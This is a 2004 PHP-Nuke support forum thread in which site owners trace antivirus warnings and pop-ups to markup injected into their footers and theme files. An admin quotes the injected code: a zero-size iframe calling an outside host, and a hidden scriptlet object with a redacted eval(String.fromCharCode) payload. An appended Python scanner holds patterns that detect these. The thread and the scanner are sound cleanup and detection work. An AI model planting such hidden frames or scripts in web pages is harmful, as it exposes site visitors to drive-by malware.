Author |
Message |
maczan1205
Nuke Soldier


Joined: Mar 30, 2004
Posts: 32
Location: Montréal
|
Posted:
Tue Nov 16, 2004 4:39 pm |
  |
I have a Nuke 7.1 site that has worked great for 6 months, and now users that access the site on IE are getting a warning that the "MHTMLRedir.Exploit" virus has been detected.
How can I check to see if my site is affected?
Is there a way to check the files? I could not find any recent modifications to any of the files and the site works fine. |
|
|
   |
 |
Evaders99
Site Admin


Joined: Aug 17, 2003
Posts: 12482
|
Posted:
Tue Nov 16, 2004 5:19 pm |
  |
|
     |
 |
Mesum
Support Staff


Joined: Mar 11, 2003
Posts: 842
Location: Chicago
|
Posted:
Tue Nov 16, 2004 5:51 pm |
  |
|
       |
 |
maczan1205
Nuke Soldier


Joined: Mar 30, 2004
Posts: 32
Location: Montréal
|
Posted:
Tue Nov 16, 2004 6:12 pm |
  |
Thanks for the replies.
No Ads on the site.
How can I check for the SQL injection?
Or any suggestions on the easiest solution?
I have had a few questions about new "pop ups" |
|
|
   |
 |
maczan1205
Nuke Soldier


Joined: Mar 30, 2004
Posts: 32
Location: Montréal
|
Posted:
Wed Nov 17, 2004 7:56 am |
  |
Evaders99 wrote: |
Probably an SQL injection - check your database, probably the messages or the footer |
How can I check for this - start searching the database dump for code?
What am I looking for in the SQL - data?
Any help to point me in the right direction is appreciated.
BTW - I only have 2 messages and the text looks fine, same with the footer - only short text there also - no code. |
|
|
   |
 |
Evaders99
Site Admin


Joined: Aug 17, 2003
Posts: 12482
|
Posted:
Wed Nov 17, 2004 9:57 am |
  |
Use phpMyAdmin to go to your config table. Look for the footer fields and see if anything is added there.
Go to your messages table and see if anything is added there.
There are possibly other areas if your site has been compromised. I would scour your database and check everything out. |
_________________ Helping those that help themselves
Read FIRST or DIE!
"Fighting is terrible, but not as terrible as losing the will to fight."
Star Wars Rebellion Network - Need Help? Evaders Squadron Coding |
|
     |
 |
maczan1205
Nuke Soldier


Joined: Mar 30, 2004
Posts: 32
Location: Montréal
|
Posted:
Wed Nov 17, 2004 5:55 pm |
  |
Evaders99 wrote: |
Use phpMyAdmin to go to your config table. Look for the footer fields and see if anything is added there.
Go to your messages table and see if anything is added there.
There are possibly other areas if your site has been compromised. I would scour your database and check everything out. |
Thanks for the suggestions - Checked out the tables, not much there but simple text that matches the text entered on the web site by myself.
Users are reporting the warning as soon as they try to log in - I am at a loss as to where to check next.
I am willing to reinstall the whole site but will lose all the data - I guess I can choose a date before the problem started and use that data.
I am still not sure what to look for in any of the tables.
Anyway, thanks for the replies! |
|
|
   |
 |
Evaders99
Site Admin


Joined: Aug 17, 2003
Posts: 12482
|
Posted:
Wed Nov 17, 2004 6:21 pm |
  |
|
     |
 |
Evaders99
Site Admin


Joined: Aug 17, 2003
Posts: 12482
|
Posted:
Wed Nov 17, 2004 7:30 pm |
  |
This was added to your footer:
Code: |
<Iframe Src="http://2awm.com/pop/get.php?user=tt1sp" width=0 height=0></Iframe><center>
|
I would check your database again. Possibly your theme template too |
|
     |
 |
maczan1205
Nuke Soldier


Joined: Mar 30, 2004
Posts: 32
Location: Montréal
|
Posted:
Wed Nov 17, 2004 7:46 pm |
  |
Hey thanks a million!
I found it in the theme, header file.
Seems ok now
Much appreciated. |
|
|
   |
 |
ybrich
Nuke Soldier


Joined: May 25, 2003
Posts: 16
|
Posted:
Thu Nov 18, 2004 5:37 pm |
  |
Mine was injected into the copyright column of the config.
 |
|
|
   |
 |
chukar
Nuke Cadet


Joined: Nov 19, 2004
Posts: 7
|
Posted:
Fri Nov 19, 2004 8:37 am |
  |
I'm also getting this problem with 7.2 and have searched for the above code but can't locate it.
I have the site secured by restricting my .htaccess file to my ip address, so it's hard to see how someone could get in and insert that code.
I'm mystified. |
|
|
   |
 |
Evaders99
Site Admin


Joined: Aug 17, 2003
Posts: 12482
|
Posted:
Fri Nov 19, 2004 10:15 am |
  |
|
     |
 |
kewlbrew
Nuke Soldier


Joined: Sep 03, 2004
Posts: 22
|
Posted:
Fri Nov 19, 2004 1:25 pm |
  |
I'm having the same trouble. Every time anyone clicks anything they get a small pop-up. I use Nuke 7.0 and checked my header file but didn't see anything. If anyone can take a look at the code, it's at www.gonewanderin.com/indexold.php. I would appreciate it very much. |
Last edited by kewlbrew on Sat Nov 20, 2004 6:55 am; edited 1 time in total |
|
   |
 |
Evaders99
Site Admin


Joined: Aug 17, 2003
Posts: 12482
|
Posted:
Fri Nov 19, 2004 1:57 pm |
  |
This was added to your footer:
Code: |
<TEXTAREA id=cxw style="DISPLAY: none"><object data="${PR}" id="obj1" type="text/x-scriptlet" width="0" height="0"></object></TEXTAREA><SCRIPT> </SCRIPT><script language='JavaScript'>eval(String.fromCharCode(**));</script>
|
Delete from your footer in your database. Read and secure your site: http://www.nukecops.com/postt32206.html
Edit: I went ahead and deleted the characters for **, so someone else cannot try to get this code. |
|
     |
 |
|
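Added example, not part of any post in this thread: a small Python scanner for the constructs seen in the two injected snippets quoted above (a zero-size iframe or object, a `text/x-scriptlet` object, and `eval(String.fromCharCode(`), run over theme files and a database dump. The sample input, the rule names, the file extensions and the `config` table name in the sample row are constructed for illustration.

```python
import re
from pathlib import Path

# Indicators taken from the two injected snippets quoted in this thread.
TAG = re.compile(r"<(iframe|object)\b[^>]*>", re.I)
# width/height of 0, quoted or not; \\? also accepts the \" escaping of SQL dumps.
ZERO_DIM = re.compile(r"""\b(?:width|height)\s*=\s*\\?["']?0(?:px)?(?=[\\"'\s>])""", re.I)
SCRIPTLET = re.compile(r"""type\s*=\s*\\?["']?text/x-scriptlet""", re.I)
EVAL_CHARCODE = re.compile(r"eval\s*\(\s*String\.fromCharCode\s*\(", re.I)

def scan_text(text, source="<string>"):
    """Return (source, line, rule, excerpt) for each suspicious construct."""
    findings = []
    def add(rule, m):
        line = text.count("\n", 0, m.start()) + 1
        findings.append((source, line, rule, m.group(0)[:80]))
    for m in TAG.finditer(text):
        if ZERO_DIM.search(m.group(0)):
            add("hidden-frame", m)
        if SCRIPTLET.search(m.group(0)):
            add("scriptlet-object", m)
    for m in EVAL_CHARCODE.finditer(text):
        add("eval-charcode", m)
    return findings

def scan_tree(root, exts=(".php", ".html", ".htm", ".tpl", ".sql")):
    """Scan theme/template files and SQL dumps under root."""
    findings = []
    for path in sorted(Path(root).rglob("*")):
        if path.is_file() and path.suffix.lower() in exts:
            findings += scan_text(path.read_text(errors="replace"), str(path))
    return findings

# Constructed sample: footer text, a theme line and one row of a database dump.
SAMPLE = "\n".join([
    "<center>Site footer text</center>",
    '<Iframe Src="http://ads.example.invalid/get.php?user=x" width=0 height=0></Iframe>',
    r"INSERT INTO config VALUES ('<object data=\"x\" type=\"text/x-scriptlet\" width=\"0\" height=\"0\"></object>');",
    "<script language='JavaScript'>eval(String.fromCharCode(60,62));</script>",
    '<iframe src="/modules/map.html" width="400" height="300"></iframe>',
])

if __name__ == "__main__":
    for source, line, rule, excerpt in scan_text(SAMPLE, "sample"):
        print(f"{source}:{line}: {rule}: {excerpt}")
```

Point `scan_tree` at a copy of the site's theme directory and at an exported database dump; a hit gives the file and line to inspect by hand, and a clean result does not rule out other injected markup.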